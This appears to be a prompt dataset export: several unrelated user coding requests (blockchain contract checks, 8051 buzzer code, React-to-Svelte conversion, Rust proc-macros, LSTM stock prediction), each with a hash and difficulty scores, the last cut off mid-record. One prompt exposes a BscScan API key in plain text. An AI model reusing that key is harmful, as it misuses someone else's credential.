def check_method_id(input_data):
method_id = input_data[:10]
return method_id[-4:] == '6040'
async def process_block(block_number_int):
block_number = hex(block_number_int)
transactions = await get_external_transactions(block_number)
if not transactions:
print(f'No transactions found in block {block_number_int}')
else:
print(f'Transactions in block {block_number_int}:')
for tx in transactions:
if check_method_id(tx['input']):
if tx['to'] is None:
contract_address = await get_contract_address(tx['hash'])
print(f"New contract creation: Contract Address: {contract_address}")
print("\n") # Print an empty line between blocks
async def display_transactions(block_start, block_end):
tasks = [process_block(block_number) for block_number in range(block_start, block_end + 1)]
await asyncio.gather(*tasks)
async def main():
block_start = await get_latest_block_number() # Start with the latest block number
block_end = block_start + 1 # Process 10 blocks initially
while True:
await display_transactions(block_start, block_end)
# Update block_start and block_end to check for new blocks every 5 seconds
block_start = block_end + 1
block_end = await get_latest_block_number()
time.sleep(5)
asyncio.run(main())
Change the code above to return the addresses of contracts that have a TokenTracker Page
|
fcfbba8c45d10f0f39fceb0a7d0cd1c7
|
{
"intermediate": 0.4721282124519348,
"beginner": 0.3923260271549225,
"expert": 0.1355457901954651
}
|
11,272
|
dumpbin 输出.def
|
b9b859408d9ed1e8e4c9024d3ea343b2
|
{
"intermediate": 0.3038713335990906,
"beginner": 0.4159151315689087,
"expert": 0.28021350502967834
}
|
11,273
|
#include "public.h"
#include "key.h"
#include "beep.h"
#include "songdata.h"
#define Clk 0x070000
unsigned char data val_H; //计数器高字节
unsigned char data val_L; //计数器低字节
#define ROWS 4
#define COLS 4
sbit P00 = P2^5; //扬声器控制引脚
bit song_playing = 0; // 添加歌曲播放标志
void t0_isr() interrupt 1 //定时器 0 中断处理程序
{
if (song_playing) { // 当歌曲播放标志为真时,产生方波
P00 = ~P00;
} else {
P00 = 1; // 不产生方波,关闭蜂鸣器
}
TH0 = val_H; //重新装入计数值
TL0 = val_L;
}
void Delay(unsigned char cnt) //单位延时
{
unsigned char i;
unsigned int j;
for(i=0; i<cnt; i++)
{
for(j=0; j<0x3600; j++);
}
}
// 定义矩阵键盘的行列对应的引脚
sbit row1 = P1^7;
sbit row2 = P1^6;
sbit row3 = P1^5;
sbit row4 = P1^4;
sbit col1 = P1^3;
sbit col2 = P1^2;
sbit col3 = P1^1;
sbit col4 = P1^0;
// 音符频率数组
unsigned int freq[] = {262, 294, 330, 349, 392, 440, 494, 523, 0, 587, 659, 698, 784};
// 音乐保存缓冲区,最多可以保存32个音符
unsigned char music_buffer[32];
unsigned char music_length = 0;
// 定义矩阵键盘的键值
const unsigned char keymap[ROWS][COLS] = {
{'1', '2', '3', 'A'},
{'4', '5', '6', 'B'},
{'7', '8', '9', 'C'},
{'*', '0', '#', 'D'}
};
char matrix_keypad_scan()
{
char key = 0;
int i, j;
// 将所有行置为高电平,所有列置为输入模式
row1 = 1; row2 = 1; row3 = 1; row4 = 1;
col1 = 0; col2 = 0; col3 = 0; col4 = 0;
// 检测每一行的状态
for (i = 0; i < ROWS; i++) {
switch (i) {
case 0: row1 = 0; break;
case 1: row2 = 0; break;
case 2: row3 = 0; break;
case 3: row4 = 0; break;
}
delay_10us(1000);
// 检测每一列的状态
for (j = 0; j < COLS; j++) {
if (col1 == 0) {
key = keymap[i][j];
break;
}
if (col2 == 0) {
key = keymap[i][j+1];
break;
}
if (col3 == 0) {
key = keymap[i][j+2];
break;
}
if (col4 == 0) {
key = keymap[i][j+3];
break;
}
}
// 如果检测到按键,跳出循环
if (key != 0) {
break;
}
// 恢复所有列的状态为输入模式
col1 = 1; col2 = 1; col3 = 1; col4 = 1;
}
// 等待按键释放
while (col1==0 || col2==0 || col3==0 || col4==0);
return key;
}
void main()
{
u8 key = 0;
u8 beep_flag1 = 0; //蜂鸣器状态标志
u8 beep_flag2 = 0;
u8 beep_flag3 = 0;
u8 beep_flag4 = 0;
unsigned int val;
unsigned char i = 0;
TMOD = 0x01; //初始化
IE = 0x82;
TR0 = 1;
while (1)
{
key = key_scan(0); //检测按键
if (key == KEY1_PRESS) //K1按下,放第一首歌
{
beep_flag1 = !beep_flag1;
beep_flag2 = 0;
beep_flag3 = 0;
beep_flag4=0;
i = 0;
}
else if (key == KEY2_PRESS) //K2按下放第二首歌
{
beep_flag2 = !beep_flag2;
beep_flag1 = 0;
beep_flag3 = 0;
beep_flag4=0;
i = 0;
}
else if (key == KEY3_PRESS) //K3按下放第三首歌
{
beep_flag3 = !beep_flag3;
beep_flag1 = 0;
beep_flag2 = 0;
beep_flag4 = 0;
i = 0;
}
else if (key == KEY4_PRESS) //K4按下放第四首歌
{
beep_flag4 = !beep_flag4;
beep_flag1 = 0;
beep_flag2 = 0;
beep_flag3 = 0;
i = 0;
}
if (beep_flag1)
{
song_playing = 1;
while (freq_list1[i]) // 频率为 0 重新开始
{
val = Clk / (freq_list1[i]);
val = 0xFFFF - val; // 计算计数值
val_H = (val >> 8) & 0xff;
val_L = val & 0xff;
TH0 = val_H;
TL0 = val_L;
Delay(time_list1[i]);
i++;
if (key_scan(0) != KEY_UNPRESS)
{
beep_flag1 = beep_flag2 = beep_flag3 =beep_flag4= 0; // 清除当前正在播放的歌曲标志,停止播放并退出循环
break;
}
}
}
else if (beep_flag2) {
song_playing = 1;
while (freq_list2[i]) // 频率为 0 重新开始
{
val = Clk / (freq_list2[i]);
val = 0xFFFF - val; // 计算计数值
val_H = (val >> 8) & 0xff;
val_L = val & 0xff;
TH0 = val_H;
TL0 = val_L;
Delay(time_list2[i]);
i++;
if (key_scan(0) != KEY_UNPRESS) {
beep_flag1 = beep_flag2 = beep_flag3 =beep_flag4= 0; // 清除当前正在播放的歌曲标志,停止播放并退出循环
break;
}
}
}
else if (beep_flag3)
{
song_playing = 1;
while (freq_list3[i]) // 频率为 0 重新开始
{
val = Clk / (freq_list3[i]);
val = 0xFFFF - val; // 计算计数值
val_H = (val >> 8) & 0xff;
val_L = val & 0xff;
TH0 = val_H;
TL0 = val_L;
Delay(time_list3[i]);
i++;
if (key_scan(0) != KEY_UNPRESS) {
beep_flag1 = beep_flag2 = beep_flag3 =beep_flag4= 0; // 清除当前正在播放的歌曲标志,停止播放并退出循环
break;
}
}
}
else if (beep_flag4)
{
song_playing = 1;
while (freq_list4[i]) // 频率为 0 重新开始
{
val = Clk / (freq_list4[i]);
val = 0xFFFF - val; // 计算计数值
val_H = (val >> 8) & 0xff;
val_L = val & 0xff;
TH0 = val_H;
TL0 = val_L;
Delay(time_list4[i]);
i++;
if (key_scan(0) != KEY_UNPRESS) {
beep_flag1 = beep_flag2 = beep_flag3 =beep_flag4= 0; // 清除当前正在播放的歌曲标志,停止播放并退出循环
break;
}
}
}
else {
song_playing = 0; // 没有歌曲在播放,设置歌曲播放标志为假
}
}
}
代码中对于矩阵键盘扫描函数已写完,请补充代码,做到矩阵键盘作为电子琴键,按下键演奏出相应的音符,能够保存所演奏的音乐,并重复自动播放或暂停、退出播放等。
|
8e7c75bb8b3979ce18e21d18d709b287
|
{
"intermediate": 0.3519093990325928,
"beginner": 0.5252796411514282,
"expert": 0.12281100451946259
}
|
11,274
|
convert this react code to svelte
App.css
@import url('https://fonts.googleapis.com/css2?family=Inter:wght@400;500;700;900&family=Roboto:wght@400;500;700;900&family=Pacifico&display=swap');
:root {
--background-1: #f1ede9;
}
body {
font-family: 'Roboto', sans-serif;
font-size: 1.5vh;
}
#container {
position: absolute;
top: 50%;
left: 50%;
transform: translate(-50%, -50%);
}
#prescript-container {
background-color: var(--background-1);
height: 49vh;
width: 46vh;
}
.notepad-top {
background-color: #333;
border-top-left-radius: 1vh;
border-top-right-radius: 1vh;
height: 5vh;
}
#header {
display: flex;
flex-direction: row;
justify-content: space-between;
align-items: center;
position: relative;
border-bottom: 1px solid black;
padding: 1vh 2vh 1.5vh;
}
.prescription-icon {
font-size: 2vh;
}
.header-text {
margin-left: 1vh;
font-size: 2vh;
font-weight: 500;
}
.docInfo {
font-size: 1.3vh;
font-weight: 500;
text-align: right;
}
#prescript-form {
margin: 2vh 2.5vh;
}
.form-input {
display: flex;
}
label {
font-weight: 500;
margin-right: 1vh;
}
input, select, textarea {
font-family: 'Roboto', sans-serif;
}
.form-input> input {
background-color: var(--background-1);
border: none;
border-bottom: 1px solid black;
font-size: 1.5vh;
margin-bottom: 2vh;
flex-grow: 1;
}
*:focus {
outline: none;
}
#medication {
background-color: var(--background-1);
border: none;
border-bottom: 1px solid black;
font-size: 1.5vh;
margin-bottom: 2vh;
width: 100%;
}
#medication > option {
background-color: var(--background-1);
font-size: 1.5vh;
flex-grow: 1;
}
select:disabled, textarea:read-only, input:read-only {
color: black;
opacity: 1;
font-family: 'Roboto', sans-serif;
}
input::-webkit-outer-spin-button,
input::-webkit-inner-spin-button {
-webkit-appearance: none;
margin: 0;
}
#notes {
border: none;
font-size: 1.6vh;
margin-top: 0.5vh;
margin-bottom: 1vh;
height: 20vh;
width: 100%;
resize: none;
background-color: #F1EDE9;
}
#bottom-form {
display: flex;
justify-content: space-between;
}
.date {
margin-top: 0.5vh;
font-weight: 500;
}
.signature-input > label {
padding: 0.5vh 1vh 0;
margin: 0;
}
#sign {
font-family: 'Pacifico', cursive;
font-weight: 500;
font-size: 1.5vh;
width: 18vh;
}
#submit-button {
position: absolute;
left: 50%;
transform: translate(-50%);
background-color: #333;
border: none;
border-radius: 0.3vh;
color: white;
font-family: 'Roboto', sans-serif;
font-size: 1.5vh;
padding: 0.5vh 2vh;
margin: 2vh 0;
}
#submit-button:hover {
cursor: pointer;
background-color: #555;
}
App.tsx
import React, {useState, useEffect} from 'react';
import './App.css'
import {debugData} from "../utils/debugData";
import { useVisibility } from '../providers/VisibilityProvider';
import Form from './Form';
import Header from './Header';
import { useNuiEvent } from '../hooks/useNuiEvent';
import { formatDate } from '../utils/formatString';
export interface IFormData {
patient: string;
medication: string;
dosage: string;
notes: string;
signature: string;
}
export interface Medication {
item: string;
label: string;
}
interface DocData {
name: string;
phone: string;
}
interface IPrescriptData {
docInfo: DocData;
formInfo: IFormData | null;
createDate: string;
isReadOnly: boolean;
}
debugData([
{
action: 'setupForm',
data: {
docInfo: {
name: "Dr Glowie",
phone: "123-456-7889"
},
medInfo: [
{item: "amoxicillin", label: "Amoxicillin"},
{item: "hydromorphone", label: "Hydromorphone"},
{item: "oxycodone", label: "Oxycodone"},
],
unixTime: 1683869960,
},
}
])
debugData([
{
action: 'setupReadOnly',
data: {
docInfo: {
name: "Dr Glowie",
phone: "123-456-789",
},
formInfo: {
patient: "Jin Pain",
medication: "Hydromorphone",
dosage: "32",
notes: "Some notes here :)",
signature: "Super Cool Signature",
},
unixTime: 1683869960,
},
}
])
const App: React.FC = () => {
const { visible, setVisible } = useVisibility();
const [medList, setMedList] = useState<Medication[]>([]);
const [prescriptData, setPrescriptData] = useState<IPrescriptData>({
docInfo: {name: "", phone: ""},
formInfo: null,
createDate: "",
isReadOnly: true,
})
useNuiEvent("setupForm", (data: {docInfo: DocData, medInfo: Medication[], unixTime: number}) => {
const formattedDate = formatDate(data.unixTime);
setPrescriptData(prevData => {
return {
...prevData,
docInfo: data.docInfo,
formInfo: null,
createDate: formattedDate,
isReadOnly: false,
}
})
setMedList(data.medInfo);
setVisible(true);
})
useNuiEvent("setupReadOnly", (data: {docInfo: DocData, formInfo: IFormData, unixTime: number}) => {
const formattedDate = formatDate(data.unixTime);
setPrescriptData(prevData => {
return {
...prevData,
docInfo: data.docInfo,
formInfo: data.formInfo,
createDate: formattedDate,
isReadOnly: true,
}
})
setVisible(true);
})
return (
<div id="container">
<div className="notepad-top"></div>
<div id="prescript-container">
<Header
name={prescriptData.docInfo.name}
phone={prescriptData.docInfo.phone}
/>
<Form
medList={medList}
createDate={prescriptData.createDate}
prescript={prescriptData.formInfo}
isReadOnly={prescriptData.isReadOnly}
/>
</div>
</div>
);
}
export default App;
Form.tsx
import React, {useEffect, useState} from 'react';
import { Medication, IFormData } from './App';
import { useVisibility } from '../providers/VisibilityProvider';
import {fetchNui} from "../utils/fetchNui";
interface FormProps {
medList: Medication[] | null;
prescript: IFormData | null;
createDate: string;
isReadOnly: boolean;
}
const Form = ({medList, prescript, createDate, isReadOnly}: FormProps) => {
const { visible, setVisible } = useVisibility();
const [formData, setFormData] = useState({
patient: "",
medication: "",
dosage: "",
notes: "",
signature: "",
});
const handleInputChange = (e:React.ChangeEvent<any>): void => {
setFormData(prevData => {
return {
...prevData,
[e.target.name]: e.target.value
}
})
}
const handleReset = () => {
setFormData({
patient: "",
medication: "",
dosage: "",
notes: "",
signature: "",
})
}
const handleSubmit = () => {
fetchNui<{success: boolean}>("submit", formData).then(data => {
if (data.success) {
handleReset();
}
});
}
useEffect(() => {
if (!visible) {
handleReset();
}
}, [visible])
return (
<form id="prescript-form">
<div className="form-input">
<label htmlFor="patient">Patient Name: </label>
<input id="patient" type="text" onChange={handleInputChange} value={prescript?.patient || formData.patient} name="patient" readOnly={isReadOnly}/>
</div>
<div className="form-input">
<label htmlFor="medication">Rx: </label>
<select id="medication" onChange={handleInputChange} value={formData.medication} name="medication" disabled={isReadOnly}>
<option value="">{prescript?.medication || "Select Medication"}</option>
{medList && medList.map((option) => (
<option key={option.item} value={option.item}>{option.label}</option>
))}
</select>
</div>
<div className="form-input">
<label htmlFor="doses">Dosages #: </label>
<input id="doses" type="number" onChange={handleInputChange} value={prescript?.dosage || formData.dosage} name="dosage" disabled={isReadOnly}/>
</div>
<label htmlFor="notes">Additional Notes:</label>
<br />
<textarea id="notes" onChange={handleInputChange} value={prescript?.notes || formData.notes} name="notes" disabled={isReadOnly} />
<div id="bottom-form">
<div className="form-input signature-input">
<label htmlFor="sign">Signature: </label>
<input id="sign" type="text" onChange={handleInputChange} value={prescript?.signature || formData.signature} name="signature" disabled={isReadOnly} />
</div>
<div className="date">Date: {createDate}</div>
</div>
{isReadOnly || <button id="submit-button" type="button" onClick={handleSubmit} disabled={isReadOnly}>Submit</button>}
</form>
)
}
export default Form
Header.tsx
import { formatPhone } from "../utils/formatString"
const Header = ({name, phone}: {name: string, phone: string}) => {
return (
<div id="header">
<div className="prescription-icon">
<i className="fa-solid fa-prescription fa-lg"></i>
<span className="header-text">Prescription</span>
</div>
<div className="docInfo">
<div className="docName">{name}</div>
<div className="docPhone">{formatPhone(phone)}</div>
</div>
</div>
)
}
export default Header
|
8462c6ac1bb1fd65abcc047f4b9e2f42
|
{
"intermediate": 0.3540199100971222,
"beginner": 0.47174668312072754,
"expert": 0.17423342168331146
}
|
11,275
|
import asyncio
import aiohttp
bscscan_api_key = 'CXTB4IUT31N836G93ZI3YQBEWBQEGGH5QS'
# Create a semaphore with a limit of 5
semaphore = asyncio.Semaphore(5)
async def get_contract_verification_status(contract_address: str) -> bool:
async with semaphore:
async with aiohttp.ClientSession() as session:
url = f"https://api.bscscan.com/api?module=contract&action=getabi&address={contract_address}&apikey={bscscan_api_key}"
try:
async with session.get(url) as response:
data = await response.json()
except Exception as e:
print(f"Error in API request: {e}")
return False
if data["result"] is None or not isinstance(data["result"], str):
return False
return data["result"] != "Contract source code not verified"
async def is_contract_verified(contract_address: str) -> bool:
return await get_contract_verification_status(contract_address)
Complete the code above so that you can enter an address to check if the contract code is verified or not.
|
538390451b4c3c4f025f7a93d5fcf9a8
|
{
"intermediate": 0.5409077405929565,
"beginner": 0.2581484317779541,
"expert": 0.20094376802444458
}
|
11,276
|
'utf-8' codec can't decode byte 0xb5 in position 0: invalid start byte
|
18c029263a6212165657581b76778527
|
{
"intermediate": 0.37180814146995544,
"beginner": 0.2752907872200012,
"expert": 0.3529011011123657
}
|
11,277
|
Procedural Macros: Error handling
Published 2021-05-11 on blog.turbo.fish
This is the third article in my series about procedural macros. The examples here are based on the Getters derive macro from the previous article.
As the title says, this time I'll explain error handling, specifically how to use syn::Error to produce errors that will be shown by the compiler as originating somewhere in the macro input, rather than pointing at the macro invocation.
A use case
Before we can start adding meaningful spans to parts of the macro input, there has to be the possibility for errors other than those already caught by the Rust compiler itself. Luckily, there is a common way in which the input of a derive macro can be wrong in a way specific to that macro, so I can continue on with the previous Getters example rather than coming up with, and explaining, a new function-like or attribute proc-macro.
That common possibility for errors is attributes: Many derive macros come with their own attribute(s), and generally they emit an error when one such attribute is used incorrectly. For the Getters macro there is one obvious (to me) customization possibility that an attribute would enable: Renaming. As such, we will add a getter field attribute that is used as #[getter(name = "foo")].
Registering the attribute
The first thing that has to be done before starting to look for attributes in the DeriveInput is registering the attribute. By default if rustc encounters an unknown attribute, that is an error:
error: cannot find attribute `getter` in this scope
--> src/ratchet/keys.rs:15:7
|
15 | #[getter(name = "init_vec")]
| ^^^^^^
Making that error disappear is as simple as updating the #[proc_macro_derive] attribute on our proc-macro entry point:
#[proc_macro_derive(Getters, attributes(getter))]
// ^^^^^^^^^^^^^^^^^^ this is new
pub fn getters(input: TokenStream) -> TokenStream {
let input = parse_macro_input!(input as DeriveInput);
expand_getters(input).into()
}
Parsing the attribute
Since custom parsing is complex enough to deserve its own article, I'm going to use syn::Attribute::parse_meta here, which is sufficient for the syntax shown above.
// Note: syn::Ident is a re-export of proc_macro2::Ident
use syn::{Attribute, Ident};
fn get_name_attr(attr: &Attribute) -> syn::Result<Option<Ident>> {
let meta = attr.parse_meta()?;
todo!()
}
The syn::Result<T> type above is simply a type alias for Result<T, syn::Error>. Since syns Meta type can only represent a limited subset of the arbitrary token trees allowed within attributes, parsing it is fallible, and returns syn::Result<syn::Meta>.
Luckily detecting whether an attribute is possible without calling any of Attributes parse_ methods, so we can detect whether the attribute is for us before executing this fallible operation.
But I'm getting ahead of myself… First, let's add more to our new function. Here is what the most common way of constructing a syn::Error looks like (for me at least):
use syn::Meta;
let meta_list = match meta {
Meta::List(list) => list,
// *Almost* equivalent (see syn documentation) to:
// use syn::spanned::Spanned;
// return Err(syn::Error::new(meta.span(), "expected a list-style attribute"))
_ => return Err(syn::Error::new_spanned(meta, "expected a list-style attribute")),
};
As you can see, creating a syn::Error is nothing special.
The rest of get_name_attr works in much the same way:
use syn::{Lit, NestedMeta};
let nested = match meta_list.nested.len() {
// `#[getter()]` without any arguments is a no-op
0 => return Ok(None),
1 => &meta_list.nested[0],
_ => {
return Err(syn::Error::new_spanned(
meta_list.nested,
"currently only a single getter attribute is supported",
));
}
};
let name_value = match nested {
NestedMeta::Meta(Meta::NameValue(nv)) => nv,
_ => return Err(syn::Error::new_spanned(nested, "expected `name = \"<value>\"`")),
};
if !name_value.path.is_ident("name") {
// Could also silently ignore the unexpected attribute by returning `Ok(None)`
return Err(syn::Error::new_spanned(
&name_value.path,
"unsupported getter attribute, expected `name`",
));
}
match &name_value.lit {
Lit::Str(s) => {
// Parse string contents to `Ident`, reporting an error on the string
// literal's span if parsing fails
syn::parse_str(&s.value()).map_err(|e| syn::Error::new_spanned(s, e))
}
lit => Err(syn::Error::new_spanned(lit, "expected string literal")),
}
Adjusting the existing codegen
Now we have a new method to parse #[getter] attributes, but we aren't using it yet. We need to update the existing code generation logic to take these attributes into account, and the first step towards that is making the expand_getters function fallible as well.
If it's been some time since you read the last article, here is its signature again (you can also review the entire definition here):
pub fn expand_getters(input: DeriveInput) -> TokenStream {
Which now becomes
pub fn expand_getters(input: DeriveInput) -> syn::Result<TokenStream> {
The new expand_getters implementation is a bit longer, but still manageable:
// Same as before
let fields = match input.data {
Data::Struct(DataStruct { fields: Fields::Named(fields), .. }) => fields.named,
_ => panic!("this derive macro only works on structs with named fields"),
};
// All the new logic comes in here
let getters = fields
.into_iter()
.map(|f| {
// Collect getter attributes
let attrs: Vec<_> =
// This `.filter` is how we make sure to ignore builtin attributes, or
// ones meant for consumption by different proc-macros.
f.attrs.iter().filter(|attr| attr.path.is_ident("getter")).collect();
let name_from_attr = match attrs.len() {
0 => None,
1 => get_name_attr(attrs[0])?,
// Since `#[getter(name = ...)]` is the only available `getter` attribute,
// we can just assume any attribute with `path.is_ident("getter")` is a
// `getter(name)` attribute.
//
// Thus, if there is two `getter` attributes, there is a redundancy
// which we should report as an error.
//
// On nightly, you could also choose to report a warning and just use one
// of the attributes, but emitting a warning from a proc-macro is not
// stable at the time of writing.
_ => {
let mut error = syn::Error::new_spanned(
attrs[1],
"redundant `getter(name)` attribute",
);
// `syn::Error::combine` can be used to create an error that spans
// multiple independent parts of the macro input.
error.combine(
syn::Error::new_spanned(attrs[0], "note: first one here"),
);
return Err(error);
}
};
// If there is no `getter(name)` attribute, use the field name like before
let method_name =
name_from_attr.unwrap_or_else(|| f.ident.clone().expect("a named field"));
let field_name = f.ident;
let field_ty = f.ty;
Ok(quote! {
pub fn #method_name(&self) -> &#field_ty {
&self.#field_name
}
})
})
// Since `TokenStream` implements `FromIterator<TokenStream>`, concatenating an
// iterator of token streams without a separator can be using `.collect()` in
// addition to `quote! { #(#iter)* }`. Through std's `FromIterator` impl for
// `Result`, we get short-circuiting on errors on top.
.collect::<syn::Result<TokenStream>>()?;
// Like before
let st_name = input.ident;
let (impl_generics, ty_generics, where_clause) = input.generics.split_for_impl();
// Resulting TokenStream wrapped in Ok
Ok(quote! {
#[automatically_derived]
impl #impl_generics #st_name #ty_generics #where_clause {
// Previously: #(#getters)*
//
// Now we don't need that anymore since we already
// collected the getters into a TokenStream above
#getters
}
})
If this is the first time you have seen .collect::<Result<_, _>>, you can find the documentation for the trait implementation that makes it possible here.
Passing a syn::Error to the compiler
One final piece of the puzzle is missing: How does syn::Error become a compiler error? We can't update our proc-macro entry point to return syn::Result, that would result in an error because proc-macro entry points are required to return just a TokenStream.
However, the solution is almost as easy and you might already have seen it if you had a look at syn::Errors documentation:
// Previously, with expand_getters returning proc_macro2::TokenStream
expand_getters(input).into()
// Now, returning syn::Result<proc_macro2::TokenStream>
expand_getters(input).unwrap_or_else(syn::Error::into_compile_error).into()
What this does under the hood is actually kind of weird: It produces a TokenStream like
quote! { compile_error!("[user-provided error message]"); }
but with the span being the one given when constructing the syn::Error. As weird as it is, that's simply the only way to raise a custom compiler error on stable (as of the time of writing).
If you haven't seen compile_error! before, it's a builtin macro.
And that's it!
That's all there really is when it comes to proc-macro specific error handling knowledge. Like last time, you can review the changes from this blog post in the accompanying repo:
Complete code
Individual commits
If you want to practice your proc-macro skills but haven't come up with anything to create or contribute to at this point, I recommend having a look at David Tolnay's proc-macro-workshop.
Next time, I will explain how to parse custom syntax, which can be useful for derive macros when you want to go beyond what syn::Meta allows, and is crucial for many attribute macros as well as the majority of function-like proc-macros. Stay tuned!
based on above, come up with 10 solutions written in rust. requirements: strictly using only std library when possible. task: make proc macro using proc-macro2 crate that get into argument type of $str intentionally erroneous expression containing syntax error, that may cause parse error and panic, but we should handle and avoid it by any means with our solution writing in code. initial code to elaborate: fn main { let erroneous_expr_str = "unimplemented(;"; tokens_from_str(erroneous_expr_str); } fn tokens_from_str(stream: &str) -> TokenStream { //... this needs to elaborate with code, that determines if the "stream" is erroneous, yet not falling in panic or any error, just return empty token stream if the "stream" is erroneous or return stream converted in token stream if the "stream" is not erroneous}. start with several most effective solutions, proceed through several sophisticated uncompromisingly solving the task to the several completely different approaches that might or might not ignoring the requirements
|
3d86be6bd4cd104e17a53e1492120eb3
|
{
"intermediate": 0.3858981132507324,
"beginner": 0.41360267996788025,
"expert": 0.20049919188022614
}
|
11,278
|
what is difference in Attribute Macros versus Function-like Macro in rust explained on rust code of effective use of both approaches
|
f21bfaada90d22a377ebedb5085ec132
|
{
"intermediate": 0.2692890465259552,
"beginner": 0.25010401010513306,
"expert": 0.48060697317123413
}
|
11,279
|
Make a test CSS to fit all child buttons into the parent header using flex
|
544ce0f88e38eac54bbe8a3a9888ccad
|
{
"intermediate": 0.3856859803199768,
"beginner": 0.2877774238586426,
"expert": 0.3265365958213806
}
|
11,280
|
I have created a stock market prediction model based on super indication now in this you need give code to make predictions for upcoming prices for next 5 days using the model also in y axis insted of time make it date:
import yfinance as yf
import pandas as pd
import numpy as np
from sklearn.preprocessing import MinMaxScaler
from keras.models import Sequential
from keras.layers import Dense, LSTM
from keras.callbacks import LambdaCallback
nifty = yf.download('^NSEI', start='2009-01-01', end='2021-01-01')
def supertrend(df, period=10, multiplier=3):
hl = (df['High'] + df['Low']) / 2
atr = df['High'].rolling(period).max() - df['Low'].rolling(period).min()
up = hl - multiplier * atr
dn = hl + multiplier * atr
df['ST'] = 0
df['ST'][0] = (df['High'][0] + df['Low'][0]) / 2
position = 'none'
for i in range(1, len(df)):
if df['Close'][i] > up[i]:
if position != 'buy':
position = 'buy'
df['ST'][i] = dn[i]
else:
df['ST'][i] = max(df['ST'][i - 1], dn[i])
elif df['Close'][i] < dn[i]:
if position != 'sell':
position = 'sell'
df['ST'][i] = up[i]
else:
df['ST'][i] = min(df['ST'][i - 1], up[i])
else:
df['ST'][i] = df['ST'][i - 1]
return df
nifty = supertrend(nifty)
nifty.head()
dataset = nifty['Close'].values
dataset = dataset.astype('float32')
dataset = dataset.reshape(-1, 1)
scaler = MinMaxScaler(feature_range=(0, 1))
dataset = scaler.fit_transform(dataset)
# convert an array of values into a dataset matrix
def create_dataset(dataset, look_back=1):
dataX, dataY = [], []
for i in range(len(dataset)-look_back-1):
a = dataset[i:(i+look_back), 0]
dataX.append(a)
dataY.append(dataset[i + look_back, 0])
return np.array(dataX), np.array(dataY)
train_size = int(len(dataset) * 0.8)
test_size = len(dataset) - train_size
train, test = dataset[:train_size], dataset[train_size:]
look_back = 1
trainX, trainY = create_dataset(train, look_back)
testX, testY = create_dataset(test, look_back)
trainX = np.reshape(trainX, (trainX.shape[0], 1, trainX.shape[1]))
testX = np.reshape(testX, (testX.shape[0], 1, testX.shape[1]))
model = Sequential()
model.add(LSTM(100, input_shape=(1, look_back)))
model.add(Dense(1))
model.compile(loss='mean_squared_error', optimizer='adam')
model.fit(trainX, trainY, epochs=200, batch_size=1, verbose=0)
trainPredict = model.predict(trainX)
testPredict = model.predict(testX)
trainPredict = scaler.inverse_transform(trainPredict)
trainY = scaler.inverse_transform([trainY])
testPredict = scaler.inverse_transform(testPredict)
testY = scaler.inverse_transform([testY])
import matplotlib.pyplot as plt
trainPredictPlot = np.empty_like(dataset)
trainPredictPlot[:, :] = np.nan
trainPredictPlot[look_back:len(trainPredict)+look_back, :] = trainPredict
testPredictPlot = np.empty_like(dataset)
testPredictPlot[:, :] = np.nan
testPredictPlot[len(trainPredict)+(look_back*2)+1:len(dataset)-1, :] = testPredict
plt.plot(scaler.inverse_transform(dataset), label='Actual')
plt.plot(trainPredictPlot, label='Train Prediction')
plt.plot(testPredictPlot, label='Test Prediction')
plt.legend()
plt.show()
model.save('my_model.h5')
|
d4b183c6564a9bf4d95537e275f91a99
|
{
"intermediate": 0.35669174790382385,
"beginner": 0.33997535705566406,
"expert": 0.3033328354358673
}
|
11,281
|
hi
|
13b17e8d6e8428b144114a3317adcccb
|
{
"intermediate": 0.3246487081050873,
"beginner": 0.27135494351387024,
"expert": 0.40399640798568726
}
|
11,282
|
I need to make a stock market prediction model for predicting the closing price using LSTM and supertrend as indicator please correct the below code for predicting the closing prices and label the plot for closing prices vs date:
import yfinance as yf
import pandas as pd
import numpy as np
from sklearn.preprocessing import MinMaxScaler
from keras.models import Sequential
from keras.layers import Dense, LSTM
from keras.callbacks import LambdaCallback
nifty = yf.download('^NSEI', start='2009-01-01', end='2021-01-01')
def supertrend(df, period=10, multiplier=3):
hl = (df['High'] + df['Low']) / 2
atr = df['High'].rolling(period).max() - df['Low'].rolling(period).min()
up = hl - multiplier * atr
dn = hl + multiplier * atr
df['ST'] = 0
df['ST'][0] = (df['High'][0] + df['Low'][0]) / 2
position = 'none'
for i in range(1, len(df)):
if df['Close'][i] > up[i]:
if position != 'buy':
position = 'buy'
df['ST'][i] = dn[i]
else:
df['ST'][i] = max(df['ST'][i - 1], dn[i])
elif df['Close'][i] < dn[i]:
if position != 'sell':
position = 'sell'
df['ST'][i] = up[i]
else:
df['ST'][i] = min(df['ST'][i - 1], up[i])
else:
df['ST'][i] = df['ST'][i - 1]
return df
nifty = supertrend(nifty)
nifty.head()
dataset = nifty['Close'].values
dataset = dataset.astype('float32')
dataset = dataset.reshape(-1, 1)
scaler = MinMaxScaler(feature_range=(0, 1))
dataset = scaler.fit_transform(dataset)
# convert an array of values into a dataset matrix
def create_dataset(dataset, look_back=1):
dataX, dataY = [], []
for i in range(len(dataset)-look_back-1):
a = dataset[i:(i+look_back), 0]
dataX.append(a)
dataY.append(dataset[i + look_back, 0])
return np.array(dataX), np.array(dataY)
train_size = int(len(dataset) * 0.8)
test_size = len(dataset) - train_size
train, test = dataset[:train_size], dataset[train_size:]
look_back = 1
trainX, trainY = create_dataset(train, look_back)
testX, testY = create_dataset(test, look_back)
trainX = np.reshape(trainX, (trainX.shape[0], 1, trainX.shape[1]))
testX = np.reshape(testX, (testX.shape[0], 1, testX.shape[1]))
model = Sequential()
model.add(LSTM(100, input_shape=(1, look_back)))
model.add(Dense(1))
model.compile(loss='mean_squared_error', optimizer='adam')
model.fit(trainX, trainY, epochs=200, batch_size=1, verbose=0)
trainPredict = model.predict(trainX)
testPredict = model.predict(testX)
trainPredict = scaler.inverse_transform(trainPredict)
trainY = scaler.inverse_transform([trainY])
testPredict = scaler.inverse_transform(testPredict)
testY = scaler.inverse_transform([testY])
import matplotlib.pyplot as plt
trainPredictPlot = np.empty_like(dataset)
trainPredictPlot[:, :] = np.nan
trainPredictPlot[look_back:len(trainPredict)+look_back, :] = trainPredict
testPredictPlot = np.empty_like(dataset)
testPredictPlot[:, :] = np.nan
testPredictPlot[len(trainPredict)+(look_back*2)+1:len(dataset)-1, :] = testPredict
plt.plot(scaler.inverse_transform(dataset), label='Actual')
plt.plot(trainPredictPlot, label='Train Prediction')
plt.plot(testPredictPlot, label='Test Prediction')
plt.legend()
plt.show()
model.save('my_model.h5')
|
8e61744dc4f0ba1496a5216efb342eb5
|
{
